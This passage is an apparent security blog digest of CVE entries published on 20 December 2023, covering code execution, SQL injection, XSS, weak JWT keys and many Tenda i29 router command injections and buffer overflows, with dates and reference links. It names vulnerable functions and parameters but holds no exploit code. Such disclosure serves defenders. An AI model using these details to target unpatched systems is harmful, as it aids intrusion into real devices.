DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message.

CVE ID : CVE-2023-45887
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/MikeIsAStar/DS-Wireless-Communication-Remote-Code-Execution | source : cve@mitre.org
https://pastebin.com/ukRzztv0 | source : cve@mitre.org


Vulnerability ID : CVE-2023-27172

First published on : 20-12-2023 01:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack.

CVE ID : CVE-2023-27172
Source : cve@mitre.org
CVSS Score : /

References :
https://balwurk.github.io/CVE-2023-27172/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-50044

First published on : 20-12-2023 09:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Buffer Overflow vulnerability in Cesanta MJS version 2.22.0, allows attackers to execute arbitrary code, cause a denial of service (Dos), and obtain sensitive information via segmentation fault can occur in getprop_builtin_foreign when input string includes a name of Built-in APIs.

CVE ID : CVE-2023-50044
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/cesanta/mjs/issues/254 | source : cve@mitre.org
https://github.com/cesanta/mjs/pull/255 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50628

First published on : 20-12-2023 09:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Buffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component.

CVE ID : CVE-2023-50628
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/libming/libming/issues/289 | source : cve@mitre.org
https://github.com/libming/libming/pull/290 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47990

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter.

CVE ID : CVE-2023-47990
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/d3do-23/cuppacve/blob/main/sql%20in%20edit_admin_table.php | source : cve@mitre.org


Vulnerability ID : CVE-2023-50639

First published on : 20-12-2023 21:15:08
Last modified on : 20-12-2023 21:15:08

Description :
Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page.

CVE ID : CVE-2023-50639
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/940198871/Vulnerability-details/blob/main/CVE-2023-50639.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50983

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function.

CVE ID : CVE-2023-50983
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysScheduleRebootSet-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50984

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function.

CVE ID : CVE-2023-50984
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/spdtstConfigAndStart.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50985

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function.

CVE ID : CVE-2023-50985
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/lanCfgSet.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50986

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function.

CVE ID : CVE-2023-50986
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysLogin.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50987

First published on : 20-12-2023 22:15:34
Last modified on : 20-12-2023 22:15:34

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function.

CVE ID : CVE-2023-50987
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysTimeInfoSet.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50988

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function.

CVE ID : CVE-2023-50988
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/wifiRadioSetIndoor.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50989

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function.

CVE ID : CVE-2023-50989
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/pingSet-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50990

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function.

CVE ID : CVE-2023-50990
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/sysScheduleRebootSet.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50992

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function.

CVE ID : CVE-2023-50992
Source : cve@mitre.org
CVSS Score : /

References :
http://tenda.com | source : cve@mitre.org
https://github.com/ef4tless/vuln/blob/master/iot/i29/setPing.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50993

First published on : 20-12-2023 22:15:35
Last modified on : 20-12-2023 22:15:35

Description :
Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles.

CVE ID : CVE-2023-50993
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/ef4tless/vuln/blob/master/iot/WS6008-WS6108/1.md | source : cve@mitre.org


Source : google.com

Vulnerability ID : CVE-2023-3742

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High)

CVE ID : CVE-2023-3742
Source : chrome-cve-admin@google.com
CVSS Score : /

References :
https://bugs.chromium.org/p/chromium/issues/detail?id=1443292 | source : chrome-cve-admin@google.com
https://crbug.com/1443292 | source : chrome-cve-admin@google.com


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports

Securitricks

Great! Youโ€™ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Securitricks.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.